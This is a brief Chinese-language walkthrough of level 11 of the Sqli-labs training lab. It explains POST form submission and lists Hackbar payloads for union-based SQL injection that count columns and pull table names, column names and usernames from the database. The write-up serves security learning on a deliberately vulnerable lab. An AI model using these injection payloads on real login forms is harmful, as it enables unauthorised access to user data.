Sqlilabs-11
从第 11 关开始我们进入了 POST 环节,什么是 POST ,POST 就是数据从客户端提交到服务端,例如在这个关卡中,我们就是将用户名和密码以表单的形式提交给服务器,然后服务器再进行验证。
如图,在 Hackbar 我们需要构造 uname passwd submit 三样东西,其实这跟我们做的第一关没什么差别,只是换了个地方构造 payload 而已,或者你可以不用 hackbar ,直接在输入框里输入构造 payload 也是可以的。
这里就以 hackbar 为例构造 payload:uname=admin' order by 3#&passwd=1&submit=submituname=admin' order by 2#&passwd=1&submit=submit
uname=-admin' union select 1,2#&passwd=1&submit=submit
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=submit
uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'users'#&passwd=1&submit=submit
uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit
uname=-admin' union select 1,group_concat(username) from users#&passwd=1&submit=submit
????